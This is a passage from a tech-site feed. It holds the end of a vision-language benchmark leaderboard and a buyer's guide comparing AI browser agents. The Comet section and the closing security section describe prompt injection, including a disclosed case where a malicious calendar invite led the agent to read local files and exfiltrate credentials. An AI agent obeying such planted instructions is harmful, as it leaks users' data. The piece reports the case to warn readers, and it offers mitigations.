<p>Alibaba's Qwen VL family has established clear leadership among open-source vision-language models. Qwen3 VL 235B tops the BLINK leaderboard at 70.7% and holds the best RealWorldQA scores. Qwen3-VL's larger model (72B) scores 85.8% on MathVista and 96.5% on DocVQA - the latter beating every closed-source frontier model except GPT-5.4. Qwen3.6 Plus leads AI2D at 94.4%.</p>
<p>This is a reversal from where things stood 18 months ago, when open-source multimodal models lagged frontier proprietary models by 15-20 points on most benchmarks. The gap on DocVQA is now essentially closed for Qwen3-VL and InternVL3. On MMMU-Pro, a meaningful gap remains - Qwen3-VL scores 69.3% against the 81-82% from Gemini 3.1 Pro and GPT-5.4. Broad multi-discipline academic reasoning at the graduate level still favors proprietary models. Specialized document and chart tasks don't.</p>
<p>See our <a href="/reviews/review-qwen-3/">Qwen 3 review</a> for context on how the broader Qwen model family performs outside visual benchmarks.</p>
<h3 id="blink-shows-what-frontier-models-still-get-wrong">BLINK Shows What Frontier Models Still Get Wrong</h3>
<p>BLINK remains the most humbling benchmark for visual reasoning. Qwen3 VL 235B leads at 70.7%, while a human would score around 95% on the same set of tasks. The gap isn't about knowledge or reasoning sophistication - it's about perceptual grounding. Tasks that require comparing relative depths in a photograph, tracing visual correspondence between two views of an object, or identifying which 3D object a 2D shadow belongs to still trip up current models at a rate that should give pause to anyone building systems where physical-world perception is safety-critical.</p>
<p>Worth noting: a 2026 paper showed BLINK scores are sensitive to design choices like visual marker size and style, which can reorder model rankings. The absolute scores should be read with some skepticism.</p>
<h3 id="mathvista-qwen-vl-beats-the-frontier">MathVista: Qwen-VL Beats the Frontier</h3>
<p>The MathVista result is striking enough to call out directly. Qwen3-VL 72B scores 85.8% on MathVista, higher than any frontier proprietary model in this comparison. Gemini 3 Pro (82.3%) and GPT-5.4 (78.4%) trail it. Mathematical visual reasoning - reading geometry figures, interpreting function graphs, extracting data from statistical tables - is a domain where the Qwen team has invested heavily. InternVL3-78B (79.0%) also beats GPT-5.4 on this specific benchmark.</p>
<p>For applications involving quantitative analysis from images - financial charts, scientific figures, engineering diagrams - the assumption that proprietary frontier models are always the best choice doesn't hold. The open-source alternatives are worth assessing on your actual task distribution.</p>
<p><img src="/images/leaderboards/vision-language-benchmarks-leaderboard-lens.jpg" alt="Close-up of smartphone camera lens showing precision optics">
<em>Increasing camera input resolution was a key architectural decision for Opus 4.7 - from 1.15MP to 3.75MP - directly improving performance on dense visual content.</em>
<small>Source: pexels.com</small></p>
<hr>
<h2 id="practical-guidance">Practical Guidance</h2>
<h3 id="best-for-enterprise-document-processing">Best for Enterprise Document Processing</h3>
<p><strong>GPT-5.4</strong> is the clear choice if your pipeline mostly processes invoices, contracts, forms, and receipts. Its 95% on DocVQA and 92.5% on ChartQA combined with strong language model capability for following complex extraction instructions makes it the most reliable option for production document workflows. The pricing isn't cheap, but document processing use cases usually justify it on value recovered per document.</p>
<p><strong>Qwen3-VL 72B</strong> is the open-source alternative worth evaluating seriously. At 96.5% on DocVQA it matches or beats every proprietary model, and it can be self-hosted on infrastructure you control - which matters for document workflows involving sensitive data.</p>
<h3 id="best-for-scientific-research-assistance">Best for Scientific Research Assistance</h3>
<p><strong>Claude Opus 4.7</strong> takes the top spot for scientific figure analysis. If your application needs to extract insights from arXiv-style charts, interpret experimental results, or process multi-panel research figures, the CharXiv-R result at 91.0% is the most relevant signal available. The extended resolution also helps with poster presentations and conference slides where content density is high.</p>
<h3 id="best-for-mathematical-and-technical-reasoning-from-images">Best for Mathematical and Technical Reasoning from Images</h3>
<p><strong>Qwen3-VL 72B</strong> scores highest on MathVista (85.8%) among all models with confirmed scores. For geometry problems, quantitative chart analysis, or any task requiring mathematical inference from a visual input, this is the model to test first. InternVL3-78B (79.0%) is a strong second and has a more mature deployment ecosystem.</p>
<h3 id="budget-option">Budget Option</h3>
<p><strong>Llama 4 Maverick</strong> from Meta scores 73.7% on MathVista, 94.4% on DocVQA, and 90% on ChartQA - truly competitive with models from a year ago that commanded much higher pricing. It's open-weight and deployable via standard inference infrastructure. Our <a href="/reviews/review-llama-4-maverick/">Llama 4 Maverick review</a> covers performance in more depth.</p>
<hr>
<h2 id="methodology-caveats">Methodology Caveats</h2>
<p>Two issues specific to visual reasoning benchmarks are worth acknowledging. First, several of these benchmarks - especially DocVQA and ChartQA - are now in a range where small differences in evaluation configuration (prompt format, few-shot examples, extraction parsing) can swing results by 1-3 points. Numbers from different evaluators shouldn't be compared directly. The scores in this table are sourced from provider-reported results where available and independent evaluators where not, which introduces some inconsistency.</p>
<p>Second, MMMU contamination is a genuine concern. The original MMMU questions are widely available online, and models trained after 2024 on broad web datasets will have seen some fraction of them. MMMU-Pro and CharXiv use harder-to-replicate content, but no benchmark is immune. This is why the field is developing new evaluations like OCRBench v2, which used human-verified pairs not published before the benchmark's release.</p>
<p>For more context on how to read AI benchmark data critically, see our <a href="/guides/understanding-ai-benchmarks/">guide to understanding AI benchmarks</a>.</p>
<hr>
<h2 id="faq">FAQ</h2>
<h3 id="which-model-is-best-for-reading-scanned-documents">Which model is best for reading scanned documents?</h3>
<p>GPT-5.4 leads DocVQA at 95%, making it the top choice for scanned document extraction. Qwen3-VL 72B scores 96.5% and is the best open-source alternative for sensitive or self-hosted workflows.</p>
<h3 id="is-mmmu-still-useful-for-comparing-models-in-2026">Is MMMU still useful for comparing models in 2026?</h3>
<p>MMMU-Pro is the more useful variant. The original MMMU is too saturated above 80% to differentiate frontier models. MMMU-Pro, with 10-option questions and harder visual reasoning requirements, still provides meaningful signal.</p>
<h3 id="why-does-qwen-vl-beat-frontier-models-on-some-benchmarks">Why does Qwen-VL beat frontier models on some benchmarks?</h3>
<p>Qwen3-VL has been optimized specifically for document and mathematical visual tasks with targeted training data. On MathVista (85.8%) and DocVQA (96.5%) it outperforms all closed-source models. On broader academic multi-discipline benchmarks like MMMU-Pro, proprietary frontier models maintain a lead.</p>
<h3 id="how-is-charxiv-different-from-chartqa">How is CharXiv different from ChartQA?</h3>
<p>ChartQA uses presentation-style charts and is now cleared at 90%+ by most models. CharXiv uses charts from actual arXiv scientific papers, which are significantly denser and less standardized. CharXiv-R specifically tests multi-step reasoning across full charts rather than single-fact lookup questions.</p>
<h3 id="what-does-blink-measure">What does BLINK measure?</h3>
<p>BLINK tests core visual perception - depth estimation, visual correspondence, multi-view reasoning, and similar tasks humans solve instantly. Models still score far below human performance (70% vs. 95%), making BLINK one of the few benchmarks where frontier models clearly fail at something humans find trivial.</p>
<h3 id="how-often-should-i-re-check-these-rankings">How often should I re-check these rankings?</h3>
<p>Visual reasoning is one of the faster-moving benchmark categories right now. Claude Opus 4.7's resolution upgrade and Qwen3-VL's document improvements both shipped in early 2026. Check this leaderboard quarterly - major capability jumps are still happening at multi-month intervals.</p>
<hr>
<p><strong>Sources:</strong></p>
<ul>
<li><a href="https://llm-stats.com/benchmarks/mmmu-pro">MMMU-Pro Leaderboard - llm-stats.com</a></li>
<li><a href="https://llm-stats.com/benchmarks/mmmu">MMMU Leaderboard - llm-stats.com</a></li>
<li><a href="https://mathvista.github.io/">MathVista - mathvista.github.io</a></li>
<li><a href="https://llm-stats.com/benchmarks/charxiv-r">CharXiv-R Leaderboard - llm-stats.com</a></li>
<li><a href="https://llm-stats.com/benchmarks/blink">BLINK Leaderboard - llm-stats.com</a></li>
<li><a href="https://llm-stats.com/benchmarks/realworldqa">RealWorldQA Leaderboard - llm-stats.com</a></li>
<li><a href="https://llm-stats.com/benchmarks/ai2d">AI2D Leaderboard - llm-stats.com</a></li>
<li><a href="https://arxiv.org/html/2501.00321v2">OCRBench v2 Paper - arxiv.org</a></li>
<li><a href="https://arxiv.org/html/2504.10479v1">InternVL3 Paper - arxiv.org</a></li>
<li><a href="https://www.llama.com/models/llama-4/">Llama 4 Benchmarks - llama.com</a></li>
<li><a href="https://automatio.ai/models/gemini-3-1-pro">Gemini 3.1 Pro Benchmarks - automatio.ai</a></li>
<li><a href="https://automatio.ai/models/gpt-5-4">GPT-5.4 Benchmarks - automatio.ai</a></li>
<li><a href="https://www.vellum.ai/blog/claude-opus-4-7-benchmarks-explained">Claude Opus 4.7 Benchmarks - vellum.ai</a></li>
<li><a href="https://artificialanalysis.ai/evaluations/mmmu-pro">MMMU-Pro Benchmark - Artificial Analysis</a></li>
<li><a href="https://arxiv.org/abs/2511.21631">Qwen3-VL Technical Report - arxiv.org</a></li>
<li><a href="https://charxiv.github.io/">CharXiv Benchmark - charxiv.github.io</a></li>
<li><a href="https://arxiv.org/html/2404.12390v3">BLINK Benchmark Paper - arxiv.org</a></li>
</ul>
]]></content:encoded><dc:creator>James Kowalski</dc:creator><category>Leaderboards</category><media:content url="https://awesomeagents.ai/images/leaderboards/vision-language-benchmarks-leaderboard_hu_4e1e0c24fc4a2024.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/leaderboards/vision-language-benchmarks-leaderboard_hu_4e1e0c24fc4a2024.jpg" width="1200" height="675"/></item><item><title>Best AI Browser Agents 2026: Top Picks Compared</title><link>https://awesomeagents.ai/tools/best-ai-browser-agents-2026/</link><pubDate>Fri, 17 Apr 2026 13:26:32 +0200</pubDate><guid>https://awesomeagents.ai/tools/best-ai-browser-agents-2026/</guid><description>&lt;p>The browser market split in 2025. On one side: developer-oriented automation tools like Browser Use and Playwright MCP (covered in our &lt;a href="/tools/best-ai-browser-automation-tools-2026/">AI browser automation tools roundup&lt;/a>). On the other: consumer-facing AI browsers that ship with an agent built right into the UI. You download a browser, open it, and tell it to book you a flight. No API keys. No Python.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>The browser market split in 2025. On one side: developer-oriented automation tools like Browser Use and Playwright MCP (covered in our <a href="/tools/best-ai-browser-automation-tools-2026/">AI browser automation tools roundup</a>). On the other: consumer-facing AI browsers that ship with an agent built right into the UI. You download a browser, open it, and tell it to book you a flight. No API keys. No Python.</p>
<p>This article covers the second category - browsers you'd actually put on your daily machine, where the AI agent is the product, not a plugin on top of it.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li><strong>Best overall:</strong> Perplexity Comet - deepest agentic task completion, cross-device, Claude Opus 4.6 powering Max tier, but security history is checkered</li>
<li><strong>Best privacy-first pick:</strong> Brave with AI Browsing - no IP logging, no training on your data, free base tier, local-only option available</li>
<li><strong>Best enterprise option:</strong> Island Browser - policy controls, DLP, full audit trails, agents sandboxed in a hardened Chromium environment</li>
<li>Dia, Opera Neon, and Chrome Auto Browse all landed agentic features in late 2025/early 2026 - the market is crowded and pricing has converged around $20/month</li>
</ul>
</div>
<hr>
<h2 id="what-makes-a-browser-agent-different">What Makes a Browser Agent Different</h2>
<p>A browser agent isn't a chatbot attached to your browser. The distinction matters. A chatbot answers questions about a page. An agent navigates, clicks, fills forms, and completes multi-step workflows across multiple sites without you touching the keyboard again after the initial prompt.</p>
<p>The test I use: can it book a round-trip flight to Berlin, find me a hotel under $150/night nearby, and output a formatted itinerary - all from one prompt? That task requires authenticating to travel sites, comparing multiple results, and handling decision branches when options differ. Most &quot;AI browsers&quot; fail it or require constant hand-holding. A real browser agent doesn't.</p>
<p>The other axis is privacy. Cloud-based agents process your browsing session on someone else's server. That's a real tradeoff, and not all vendors are transparent about it.</p>
<hr>
<h2 id="perplexity-comet">Perplexity Comet</h2>
<p>Comet launched on Windows and macOS in July 2025, Android in November 2025, and iOS in March 2026. It's Chromium-based, ships with a persistent AI sidebar, and at the Max tier it routes tasks through Claude Opus 4.6 for reasoning-heavy work.</p>
<p>The agent can autonomously research a topic across multiple sites, summarize findings, fill forms, manage email, and book travel. Comet Plus ($5/month, or included in Pro and Max plans) gives the agent access to trusted journalism and premium sources when doing research tasks.</p>
<p><strong>Pricing:</strong></p>
<table>
  <thead>
      <tr>
          <th>Plan</th>
          <th>Price</th>
          <th>Comet agent tier</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Free</td>
          <td>$0</td>
          <td>Basic assistant, no autonomous tasks</td>
      </tr>
      <tr>
          <td>Pro</td>
          <td>$20/month</td>
          <td>Full agent access, standard models</td>
      </tr>
      <tr>
          <td>Max</td>
          <td>$200/month</td>
          <td>Autonomous tasks, Claude Opus 4.6, 10,000 credits</td>
      </tr>
      <tr>
          <td>Enterprise Pro</td>
          <td>$40/seat/month</td>
          <td>Team controls, SSO</td>
      </tr>
      <tr>
          <td>Enterprise Max</td>
          <td>$325/seat/month</td>
          <td>Full agentic + compliance controls</td>
      </tr>
  </tbody>
</table>
<p>The $200 Max plan is the only one that unlocks what Perplexity calls &quot;Max Assistant&quot; - the routing layer that picks the right model for each subtask. For most users, the $20 Pro plan handles the majority of research and form-filling work.</p>
<p><strong>Platforms:</strong> macOS, Windows, Android, iOS.</p>
<p><strong>Privacy concern:</strong> Comet has built up six significant security vulnerabilities since its July 2025 launch. The most recent - disclosed by Zenity Labs in March 2026 - showed that a malicious calendar invite could hijack the agent into reading local files and exfiltrating credentials. <a href="/news/perplexity-comet-browser-local-file-leak/">We covered the full vulnerability chain here</a>. Perplexity patched it after a 120-day disclosure window, but the pattern of dismissing reports before quietly fixing them is worth noting. A federal court also issued a preliminary injunction in March 2026 blocking Comet's agent from accessing Amazon accounts without platform-level authorization.</p>
<p>The agentic capability is real and among the best in this category. The security track record is the asterisk.</p>
<hr>
<h2 id="dia-by-atlassian--the-browser-company">Dia (by Atlassian / The Browser Company)</h2>
<p>Dia launched in beta in June 2025, went broadly available on macOS in October 2025, and started Windows early access in March 2026. Atlassian picked up The Browser Company for $610 million in October 2025, which explains the integration push into Slack, Notion, Google Calendar, and Gmail that landed in early 2026.</p>
<p>The core interaction model is &quot;chat with your tabs.&quot; You open a bunch of research tabs, ask Dia a question, and it synthesizes an answer from everything you have open. The cross-tab reasoning is genuinely useful for knowledge work - I ran it across six tabs of conflicting benchmark data and it held the context correctly.</p>
<p>The agentic capabilities are less aggressive than Comet. Dia handles research, writing, planning, and product comparison well. It doesn't book flights or run fully autonomous multi-step workflows the way Comet's Max tier does. That may be intentional positioning - Dia is macOS-first and targets knowledge workers, not power-user automation.</p>
<p><strong>Pricing:</strong></p>
<table>
  <thead>
      <tr>
          <th>Plan</th>
          <th>Price</th>
          <th>Notes</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Free</td>
          <td>$0</td>
          <td>Limited AI usage, basic assistant</td>
      </tr>
      <tr>
          <td>Dia Pro</td>
          <td>$20/month</td>
          <td>Full AI features, integrations</td>
      </tr>
  </tbody>
</table>
<p><strong>Platforms:</strong> macOS (generally available), Windows (early access as of March 2026).</p>
<p><strong>Privacy:</strong> Dia's privacy model isn't publicly detailed in the same way as Brave's. Sessions are processed in the cloud. Given the Atlassian acquisition, enterprise data governance policies will likely tighten - but for now, treating Dia as a cloud-processed assistant is the correct assumption.</p>
<p>The Atlassian backing is a meaningful signal for long-term viability. It's also a reason to expect Jira and Confluence integrations within the year.</p>
<hr>
<h2 id="opera-neon">Opera Neon</h2>
<p>Opera made an aggressive move in this space. It started with Browser Operator in March 2025 - the first major browser to ship a native agentic feature - then rebuilt it into a standalone AI-first product called Neon, which launched in September 2025 and started charging $19.90/month in December 2025.</p>
<p>Neon's &quot;Neon Do&quot; feature handles shopping, booking, information gathering, and form completion. The technical approach is notable: it runs client-side rather than processing screenshots in the cloud, using native browser APIs to take actions without sending a video feed of your session to Opera's servers. That's a genuine privacy differentiator versus Comet.</p>
<p>The model selection at the $19.90 tier includes Gemini 3 Pro and GPT-5.1. For $19.90 you're getting a capable agent with solid model access.</p>
<p><strong>Pricing:</strong> $19.90/month. No free tier with agentic features.</p>
<p><strong>Platforms:</strong> Desktop (Windows, macOS, Linux), mobile in development.</p>
<p><strong>Best for:</strong> Users who want agentic browsing with stronger local-processing privacy guarantees than Comet and don't need the deep research tier.</p>
<hr>
<h2 id="chrome-with-gemini-auto-browse">Chrome with Gemini Auto Browse</h2>
<p>Google shipped Gemini into Chrome's sidebar in January 2026, with Auto Browse - the agentic feature - reserved for AI Pro and Ultra subscribers. The integration runs on Gemini 3.1 and handles tasks like filling forms from PDFs, filtering apartment searches, scheduling appointments, and filing expense reports.</p>
<p>Auto Browse supports Google's Universal Commerce Protocol (UCP), a standard co-developed with Shopify, Etsy, Wayfair, and Target that lets the agent complete purchases across participating retailers without breaking mid-flow. That's the most concrete agentic commerce capability of any browser in this list.</p>
<p><strong>Pricing:</strong></p>
<table>
  <thead>
      <tr>
          <th>Plan</th>
          <th>Price</th>
          <th>Auto Browse limit</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>AI Plus</td>
          <td>$7.99/month</td>
          <td>Not included</td>
      </tr>
      <tr>
          <td>AI Pro</td>
          <td>$19.99/month</td>
          <td>20 tasks/day</td>
      </tr>
      <tr>
          <td>AI Ultra</td>
          <td>$249.99/month</td>
          <td>200 tasks/day</td>
      </tr>
  </tbody>
</table>
<p><strong>Platforms:</strong> Windows, macOS, ChromeOS. US-only for Auto Browse as of April 2026.</p>
<p>The main limitation: 20 tasks/day at the $19.99 tier is constraining if you're using it for serious workflow automation. And &quot;Auto Browse&quot; is a feature inside Chrome, not a new browser - you're still running Chrome with a subscription-gated agentic panel. That's a different value proposition than a purpose-built agent browser like Comet.</p>
<p><img src="/images/tools/best-ai-browser-agents-2026-comet.jpg" alt="Person using a laptop browser with multiple tabs open for research tasks">
<em>AI browser agents work across multiple open tabs to synthesize research, fill forms, and complete multi-step tasks without manual navigation.</em>
<small>Source: unsplash.com</small></p>
<hr>
<h2 id="brave-with-ai-browsing">Brave with AI Browsing</h2>
<p>Brave Leo has been the privacy-first AI assistant story for two years. In 2026, Brave added AI Browsing - an autonomous mode available in Brave Nightly - that takes the privacy story into agentic territory.</p>
<p>The claim is verifiable. Brave doesn't log IP addresses, doesn't retain chat history, and doesn't train on your conversations. The new Trusted Execution Environment (TEE) deployment cryptographically verifies these claims rather than asking you to take them on faith. That's a level of privacy assurance that no other browser in this roundup matches.</p>
<p>The AI Browsing feature itself is still in Nightly (pre-release). It can research across multiple sites, compare products, fill shopping carts, and complete multi-step tasks. Leo supports Mixtral, Claude, and Llama models depending on tier.</p>
<p><strong>Pricing:</strong></p>
<table>
  <thead>
      <tr>
          <th>Plan</th>
          <th>Price</th>
          <th>Notes</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Free</td>
          <td>$0</td>
          <td>Leo assistant, limited usage, standard models</td>
      </tr>
      <tr>
          <td>Leo Premium</td>
          <td>$14.99/month</td>
          <td>Higher limits, priority model access, up to 5 devices</td>
      </tr>
  </tbody>
</table>
<p><strong>Platforms:</strong> Windows, macOS, Linux, Android, iOS.</p>
<p>The &quot;Bring Your Own Model&quot; option lets you connect a local Ollama instance or custom API endpoint. For users running local LLMs, Brave is the only mainstream browser that supports fully local inference with no cloud hop at all.</p>
<hr>
<h2 id="fellou">Fellou</h2>
<p>Fellou launched in May 2025 as an independent European startup (ex-DeepMind and Mozilla engineers) and went Commercial Edition in September 2025. It runs the &quot;shadow workspace&quot; model: tasks execute in a background virtual window, visible to you but not interrupting your active browsing session.</p>
<p>Before executing anything, Fellou generates a step-by-step action plan for review. You can edit or cancel before it starts. That's the right design for users who want agent assistance without a black-box running loose in their browser.</p>
<p>The RAG layer is interesting - Fellou can pull from 43+ live data sources including LinkedIn, Reddit, academic databases, and membership sites. The benchmark claim from the company (5.2x faster on complex multi-domain tasks versus Claude and Perplexity) comes from their own internal testing and isn't independently verified.</p>
<p><strong>Pricing:</strong></p>
<table>
  <thead>
      <tr>
          <th>Plan</th>
          <th>Price</th>
          <th>Notes</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Free</td>
          <td>$0</td>
          <td>Up to 4 tasks, then upgrade required</td>
      </tr>
      <tr>
          <td>Plus</td>
          <td>~$20/month</td>
          <td>More Sparks (task credits), scheduled tasks</td>
      </tr>
      <tr>
          <td>Ultra</td>
          <td>$199.90/month</td>
          <td>Unlimited Sparks, concurrent tasks, priority support</td>
      </tr>
  </tbody>
</table>
<p><strong>Platforms:</strong> macOS (generally available), Windows in development.</p>
<p>The &quot;Sparks&quot; credit model is worth understanding before committing. Each task consumes a variable number of Sparks based on complexity. Fellou estimates the cost before running, which at least gives you visibility, but the variable pricing can add up for power users. The Plus tier is competitive with Comet Pro for most use cases.</p>
<hr>
<h2 id="microsoft-edge-copilot-mode">Microsoft Edge Copilot Mode</h2>
<p>Edge's Copilot Mode - generally available as of late 2025 - is the enterprise play in this space. The consumer-grade agent story is real: Agent Mode handles multi-step browser workflows using Microsoft's CUA (Computer-Using Agent) models, multi-tab reasoning analyzes up to 30 open tabs simultaneously, and there's a Daily Briefing that pulls from Microsoft Graph and your browsing history.</p>
<p>Where Edge distinguishes itself is governance. DLP policies you've already configured in Microsoft 365 apply automatically to agentic actions. Agent Mode won't touch passwords or payment fields without explicit permission. IT admins control which sites the agent can access.</p>
<p><strong>Pricing:</strong> Copilot Mode comes with Microsoft 365 subscriptions ($6-$22/user/month depending on tier). Microsoft 365 Copilot ($30/user/month) unlocks the full enterprise agentic layer including Agent Mode.</p>
<p><strong>Platforms:</strong> Windows, macOS, iOS, Android.</p>
<p><strong>Best for:</strong> Organizations already on Microsoft 365 that need AI browsing within existing governance boundaries. Consumer users get the features for free with Edge, but the governance controls that make it genuinely enterprise-ready require the paid tier.</p>
<p><img src="/images/tools/best-ai-browser-agents-2026-privacy.jpg" alt="Locked padlock with digital security overlay representing browser privacy and data protection">
<em>Privacy models vary notably across AI browsers - from cloud-processed sessions to TEE-verified local inference and full self-hosted options.</em>
<small>Source: unsplash.com</small></p>
<hr>
<h2 id="island-enterprise-browser">Island Enterprise Browser</h2>
<p>Island isn't competing on consumer features. It's a security-first enterprise browser built for organizations that need to know exactly what their agents are doing at all times.</p>
<p>The March 2026 enterprise AI platform launch added three layers: an AI Browser that embeds governed AI chat (multiple frontier models, enterprise context via RAG, DLP enforcement), AI Automation for building and running on-demand agents with defined permissions and audit trails, and full admin controls over what sites agents can access and what actions require human approval.</p>
<p>The &quot;hardened Chromium environment&quot; framing is the key point: agents run inside a browser designed to reduce prompt injection exposure. After the year Comet had with its injection vulnerabilities, that's not just marketing language.</p>
<p><strong>Pricing:</strong> Enterprise pricing, not publicly listed. Expect per-seat contracts.</p>
<p><strong>Platforms:</strong> Windows, macOS.</p>
<p><strong>Best for:</strong> Financial services, healthcare, legal, and government organizations that can't accept the security posture of consumer agentic browsers.</p>
<hr>
<h2 id="open-source-options-surfer-and-browserbase">Open-Source Options: Surfer and Browserbase</h2>
<p>Two open-source options deserve mention for developers who want to build on top of browser agent technology rather than just use it.</p>
<p><strong>Surfer-H / Surfer 2 (H Company):</strong> An open-weight web agent that hit 92.2% on WebVoyager and 97.1% on agentic benchmarks with Surfer 2 - the state-of-the-art result as of February 2026. The Holo1 VLM models are open-sourced. This is for building agents, not for daily browsing, but it's the most capable open-weight foundation available. The <a href="https://github.com/hcompai/surfer-h-cli">CLI is available on GitHub</a>.</p>
<p><strong>Browserbase + Stagehand:</strong> The developer infrastructure layer. Stagehand wraps Playwright with LLM primitives; Browserbase provides the managed headless browser fleet. Covered in depth in <a href="/tools/best-ai-browser-automation-tools-2026/">our browser automation roundup</a>. The free tier (1 concurrent browser, 1 hour) lets you prototype before spending anything.</p>
<hr>
<h2 id="full-comparison-table">Full Comparison Table</h2>
<table>
  <thead>
      <tr>
          <th>Browser</th>
          <th>Agent tier</th>
          <th>Agentic tasks</th>
          <th>Privacy model</th>
          <th>Entry price</th>
          <th>Platforms</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Perplexity Comet</td>
          <td>High - Opus 4.6</td>
          <td>Flight booking, email, research</td>
          <td>Cloud (security incidents)</td>
          <td>Free / $20 Pro</td>
          <td>Win, Mac, iOS, Android</td>
      </tr>
      <tr>
          <td>Dia</td>
          <td>Medium - knowledge work</td>
          <td>Research, writing, planning</td>
          <td>Cloud (Atlassian)</td>
          <td>Free / $20 Pro</td>
          <td>Mac (Win in EA)</td>
      </tr>
      <tr>
          <td>Opera Neon</td>
          <td>Medium-High</td>
          <td>Shopping, booking, forms</td>
          <td>Client-side processing</td>
          <td>$19.90/month</td>
          <td>Win, Mac, Linux</td>
      </tr>
      <tr>
          <td>Chrome + Gemini</td>
          <td>Medium</td>
          <td>Forms, scheduling, commerce</td>
          <td>Google cloud</td>
          <td>$19.99 AI Pro</td>
          <td>Win, Mac, Chromebook</td>
      </tr>
      <tr>
          <td>Brave Leo</td>
          <td>Medium (Nightly)</td>
          <td>Research, shopping, forms</td>
          <td>No-log, TEE, local option</td>
          <td>Free / $14.99</td>
          <td>All platforms</td>
      </tr>
      <tr>
          <td>Fellou</td>
          <td>High</td>
          <td>Deep research, multi-site tasks</td>
          <td>Local unless cloud chosen</td>
          <td>Free (4 tasks) / $20</td>
          <td>Mac (Win coming)</td>
      </tr>
      <tr>
          <td>Edge Copilot</td>
          <td>Medium-High</td>
          <td>Multi-tab, forms, workflows</td>
          <td>Microsoft cloud + DLP</td>
          <td>M365 included</td>
          <td>Win, Mac, mobile</td>
      </tr>
      <tr>
          <td>Island</td>
          <td>Enterprise</td>
          <td>Governed agents, audit trails</td>
          <td>Enterprise hardened</td>
          <td>Custom pricing</td>
          <td>Win, Mac</td>
      </tr>
  </tbody>
</table>
<hr>
<h2 id="which-browser-agent-to-pick">Which Browser Agent to Pick</h2>
<p><strong>You want the most capable agent and price isn't the constraint:</strong> Perplexity Comet Max at $200/month, with Claude Opus 4.6 for complex tasks. Keep an eye on the security advisories.</p>
<p><strong>You want a capable agent at $20/month:</strong> Comet Pro, Dia Pro, Opera Neon, and Fellou Plus are all competitive. Comet has deeper agentic task completion; Dia has better knowledge-work integrations (Slack, Notion, Google Calendar); Opera Neon has better client-side privacy.</p>
<p><strong>Privacy is the primary requirement:</strong> Brave with AI Browsing. No IP logging, TEE-verified privacy guarantees, and a local inference option via Ollama. The AI Browsing feature is still in Nightly as of April 2026, so early-adopter roughness applies.</p>
<p><strong>You're already on Google AI Pro:</strong> Chrome's Auto Browse at 20 tasks/day is included and works well for Google-ecosystem workflows and UCP-supported commerce sites. Don't pay again for a separate browser.</p>
<p><strong>You're in an enterprise environment with compliance requirements:</strong> Island Browser for hardened, audited agents. Edge Copilot Mode if you're on Microsoft 365 and governance integration matters more than advanced agent capability.</p>
<p><strong>You want to build your own agent, not just use one:</strong> Surfer-H and Browserbase/Stagehand are the places to start. See <a href="/tools/best-ai-browser-automation-tools-2026/">our browser automation roundup</a> for the full developer-side picture.</p>
<div class="pull-quote">
<p>The consumer browser agent market converged on $20/month in late 2025. Differentiation now comes down to privacy model, task depth, and ecosystem integrations - not price.</p>
</div>
<hr>
<h2 id="the-security-reality">The Security Reality</h2>
<p>None of the vendors discuss this prominently in their marketing, but it's the practical issue that matters most for any agentic browser: every piece of web content the agent processes is a potential prompt injection surface.</p>
<p>Comet's six vulnerabilities aren't a Comet problem - they're a demonstration of the category problem. OpenAI has <a href="https://techcrunch.com/2025/12/22/openai-says-ai-browsers-may-always-be-vulnerable-to-prompt-injection-attacks/">acknowledged</a> that prompt injection in its own Atlas browser agent is &quot;unlikely to ever be completely eliminated.&quot; The architectural issue is that LLMs can't reliably distinguish between trusted user instructions and untrusted page content when they arrive in the same token stream.</p>
<p>Practical mitigations: keep password managers locked when not in active use, disable agent access to sensitive domains in browser settings, and treat your agent's access scope as your attack surface. A browser agent with access to your email and calendar has a larger blast radius than a sandboxed chatbot. Scope it accordingly.</p>
<hr>
<h2 id="sources">Sources</h2>
<ul>
<li><a href="https://www.eesel.ai/blog/perplexity-comet-pricing">Perplexity Comet pricing guide - eesel AI</a></li>
<li><a href="https://www.finout.io/blog/perplexity-pricing-in-2026">Perplexity pricing plans - finout.io</a></li>
<li><a href="https://9to5mac.com/2026/03/18/perplexity-brings-ai-comet-browser-to-iphone/">Comet arrives on iPhone - 9to5Mac</a></li>
<li><a href="https://www.diabrowser.com/">Dia browser official site</a></li>
<li><a href="https://techcrunch.com/2025/06/11/the-browser-company-launches-its-ai-first-browser-dia-in-beta/">The Browser Company launches Dia in beta - TechCrunch</a></li>
<li><a href="https://www.atlassian.com/blog/announcements/atlassian-acquires-the-browser-company">Atlassian acquires The Browser Company - Atlassian blog</a></li>
<li><a href="https://blogs.opera.com/news/2025/09/opera-neon-agentic-ai-browser-release/">Opera Neon ships - Opera blog</a></li>
<li><a href="https://techcrunch.com/2025/12/11/opera-wants-you-to-pay-20-a-month-to-use-its-ai-powered-browser-neon/">Opera Neon $19.90 subscription - TechCrunch</a></li>
<li><a href="https://press.opera.com/2025/03/03/opera-browser-operator-ai-agentics/">Opera Browser Operator announcement - Opera Newsroom</a></li>
<li><a href="https://techcrunch.com/2026/01/28/chrome-takes-on-ai-browsers-with-tighter-gemini-integration-agentic-features-for-autonomous-tasks/">Chrome Gemini agentic features - TechCrunch</a></li>
<li><a href="https://gemini.google/subscriptions/">Google AI Pro and Ultra pricing - gemini.google</a></li>
<li><a href="https://brave.com/leo/">Brave Leo official page</a></li>
<li><a href="https://brave.com/blog/ai-browsing/">Brave AI Browsing announcement</a></li>
<li><a href="https://brave.com/blog/browser-ai-tee/">Brave TEE privacy announcement</a></li>
<li><a href="https://fellou.ai/pricing">Fellou official pricing</a></li>
<li><a href="https://seraphicsecurity.com/learn/ai-browser/fellou-browser-agentic-features-pros-cons-and-security-concerns/">Fellou browser agentic features and security - Seraphic Security</a></li>
<li><a href="https://siliconangle.com/2025/07/28/microsoft-turns-edge-ai-agent-new-copilot-mode/">Edge Copilot Mode enterprise-ready - SiliconANGLE</a></li>
<li><a href="https://www.island.io/press/island-makes-ai-work-for-the-enterprise">Island enterprise AI platform - island.io</a></li>
